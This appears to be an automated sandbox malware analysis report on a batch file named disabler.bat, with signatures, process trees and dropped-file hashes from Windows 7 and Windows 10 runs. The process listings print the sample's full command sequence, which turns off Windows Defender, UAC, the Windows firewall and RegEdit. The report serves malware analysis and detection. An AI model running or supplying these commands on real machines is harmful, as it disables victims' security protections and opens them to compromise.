Malware Analysis Report

2025-08-10 11:47

Sample ID 250108-fv3p8avrds
Target disabler.bat
SHA256 c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79
Tags
evasion execution persistence privilege_escalation trojan
score
10/10

Analysis Overview

score
10/10

SHA256

c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79

Threat Level: Known bad

The file disabler.bat was found to be: Known bad.

Malicious Activity Summary

evasion execution persistence privilege_escalation trojan

UAC bypass

Contains code to disable Windows Defender

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Disables RegEdit via registry modification

Event Triggered Execution: Netsh Helper DLL

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Analysis: static1

Detonation Overview

Reported

2025-01-08 05:12

Signatures

Contains code to disable Windows Defender

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-08 05:12

Reported

2025-01-08 05:15

Platform

win7-20240903-en

Max time kernel

121s

Max time network

121s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"

Signatures

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Disables RegEdit via registry modification

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2404 wrote to memory of 2764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 2764 wrote to memory of 2768 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 2404 wrote to memory of 2824 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2760 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2688 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2692 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2244 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2976 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2404 wrote to memory of 2852 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2612 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2728 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 812 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 3048 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2800 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1648 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1100 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 1996 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
PID 2404 wrote to memory of 548 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -PUAProtection Disabled"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f

Network

N/A

Files

memory/2852-4-0x0000000002D00000-0x0000000002D80000-memory.dmp

memory/2852-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

memory/2852-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ba82edd25c65cb9256d9250fdc1ef4df
SHA1 dc079b101d43a9f11f4dc0db060aefbe9b05c05e
SHA256 915a13ceb17014ef3cf432157a2c88bc019a2129bf43015750bc86d1b5080a08
SHA512 d1d6c8b9c468412c65fc6fbac90f69db30e7363c22340cc7f9f9a5840a30ad0d503dfbd2734ba0a997eeec90ad78ec983541afffe31a9fba497dc653ccaa2433

memory/2612-12-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2612-13-0x0000000001D90000-0x0000000001D98000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-08 05:12

Reported

2025-01-08 05:15

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"

Signatures

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Disables RegEdit via registry modification

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2628 wrote to memory of 3080 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 3080 wrote to memory of 488 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 2628 wrote to memory of 3968 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 4044 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 4820 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 2892 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 60 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 2276 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2628 wrote to memory of 2944 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 436 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2088 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2056 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4052 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4844 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2436 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 3256 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
PID 2628 wrote to memory of 2964 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -PUAProtection Disabled"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f

Network

Country | Destination | Domain | Proto

Files

memory/2944-0-0x00007FFB07753000-0x00007FFB07755000-memory.dmp

memory/2944-1-0x000001C17F630000-0x000001C17F652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cwmipase.xru.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2944-11-0x00007FFB07750000-0x00007FFB08211000-memory.dmp

memory/2944-12-0x00007FFB07750000-0x00007FFB08211000-memory.dmp

memory/2944-15-0x00007FFB07750000-0x00007FFB08211000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 190cc2feb6fbf6a6143f296ebe043de5
SHA1 8fa72a99c46ed77b602476c85ca2d8ea251b22fb
SHA256 4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206
SHA512 94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7becdab2ad9e7d9ddc64007adfe686c2
SHA1 fef71543e091354d4de3a9f7bee4ccb0ee42af4f
SHA256 783470403ea42fc708f0f80a3fa5c88be41dcd378fa0d75446d39beb3275e662
SHA512 1525f9b28f5b76851e50ac904a442f6a1f6f266efabb5b9e1a69049c62ba10fe2d6976cbe9f09a1811fa737838a12665f77e860f569eba317b8344b26d318a44

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 929c856a9f5f4fd187b9b324e39be583
SHA1 b5d74d5b632f2b0d892c0b763f7f9c36f8677fec
SHA256 67fc49d5d72ee25add82821193e326f1109d7b88189560492686a8f9d8b6c97e
SHA512 5746885b047af646bee26dc965c2fea100c395b2cc89a868af5d5858dd273497c3ea2f567c11439a84502cceea001a661352b8d0873c2cf09b1697c583fc61dd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a1e249212d4af8ee7f335a5dfd075ba
SHA1 8ab2019e5d1376124bd79b822b9b1d4a794de076
SHA256 046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa
SHA512 8a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd19bc9cb94a09e301fed47789e3e465
SHA1 999814ece758478a6912e0cf61eccb2135606931
SHA256 3eea57e35145bce1c62f119586b5cd7e8a0c140fb1ca5ee40db5784edeba7c1a
SHA512 ad3bdde4ddbf94e136207900965c0c631b338895066205dff83ec2205f2ec11879b1e64ea67fe1e8145238d402177328cb8115494a0dce9400fc076836f29fcb